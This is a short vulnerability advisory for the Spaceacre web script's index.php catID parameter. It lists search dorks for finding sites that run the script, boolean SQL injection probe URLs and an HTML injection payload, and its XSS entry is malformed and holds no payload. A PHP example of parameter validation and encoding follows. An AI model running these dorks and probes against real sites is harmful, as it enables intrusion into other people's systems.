Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability



-------------------------------------------------------------------------------------------



Author: CoBRa_21



Script Home: http://www.spaceacre.com



Dork 1: inurl:cat1.php?catID= "Spaceacre"



Dork 2: intext:"Designed by Spaceacre"



-------------------------------------------------------------------------------------------



SQL Injection:



http://localhost/[path]/index.php?catID=1 and 1=2

http://localhost/[path]/index.php?catID=1 and 1=1

-------------------------------------------------------------------------------------------



HTML Injection:



http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML İNJ.



-------------------------------------------------------------------------------------------



XSS Injection:



http://localhost/[path]/index.php?catID=index.php?catID= XSS İNJ.
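
-------------------------------------------------------------------------------------------

Defensive counterpart to the three request patterns above, as an added example (this is not Spaceacre's code, which the advisory does not show): catID is accepted only as a positive integer, the lookup uses a bound parameter, and output is HTML-encoded. The categories table, its columns and all function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Accept only a positive decimal integer; arrays and mixed strings are rejected.
function parse_cat_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look up the category with a bound parameter, never string concatenation.
function find_category(PDO $db, int $catId): ?string
{
    $stmt = $db->prepare('SELECT name FROM categories WHERE id = :id'); // assumed schema
    $stmt->bindValue(':id', $catId, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

// Render a fragment; the raw request value is never echoed back.
function render_category(PDO $db, $rawCatId): string
{
    $catId = parse_cat_id($rawCatId);
    if ($catId === null) {
        return '<p>Invalid category.</p>';
    }
    $name = find_category($db, $catId);
    if ($name === null) {
        return '<p>Category not found.</p>';
    }
    // Stored data is encoded on output as well.
    return '<h1>' . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h1>';
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO categories VALUES (1, 'Tools & <Parts>')");

// catID values in the shapes this advisory uses, plus a valid one and an array.
$samples = ['1', '1 and 1=2', '1 and 1=1', '<font size=15 color=green>x</font>', ['1']];
foreach ($samples as $raw) {
    echo json_encode($raw), ' => ', render_category($db, $raw), PHP_EOL;
}
```

With this handling, both boolean test requests receive the same "Invalid category." response, so the true/false difference the SQL injection check relies on disappears.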